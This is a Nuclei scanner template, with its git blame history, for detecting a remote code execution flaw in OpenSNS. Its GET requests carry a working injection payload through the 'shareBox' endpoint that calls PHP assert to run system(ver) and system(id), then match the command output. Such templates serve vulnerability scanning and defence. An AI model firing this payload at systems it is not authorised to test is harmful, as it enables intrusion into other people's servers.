nuclei-templates/vulnerabilities/other/opensns-rce.yaml

id: opensns-rce

info:
  name: OpenSNS Remote Code Execution Vulnerability
  author: gy741
  severity: critical
  description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.
  reference:
    - http://www.0dayhack.net/index.php/2417/
    - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
  tags: opensns,rce

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)'
      - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "((u|g)id=)"
          - "Microsoft Windows"
        part: body
        condition: or

      - type: word
        words:
          - "/Application/"

      - type: status
        status:
          - 200
Create opensns-rce.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-07 09:49:36 +00:00			`id: opensns-rce`

			`info:`
minor updates 2021-07-07 13:00:15 +00:00			`name: OpenSNS Remote Code Execution Vulnerability`
Create opensns-rce.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-07 09:49:36 +00:00			`author: gy741`
			`severity: critical`
Add description 2021-10-26 12:27:57 +00:00			`description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- http://www.0dayhack.net/index.php/2417/`
			`- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E`
Create opensns-rce.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-07 09:49:36 +00:00			`tags: opensns,rce`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)'`
			`- '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)'`

			`matchers-condition: and`
			`matchers:`
minor updates 2021-07-07 13:00:15 +00:00			`- type: regex`
			`regex:`
			`- "((u\|g)id=)"`
Create opensns-rce.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-07 09:49:36 +00:00			`- "Microsoft Windows"`
			`part: body`
minor updates 2021-07-07 13:00:15 +00:00			`condition: or`

			`- type: word`
			`words:`
			`- "/Application/"`

Create opensns-rce.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-07 09:49:36 +00:00			`- type: status`
			`status:`
			`- 200`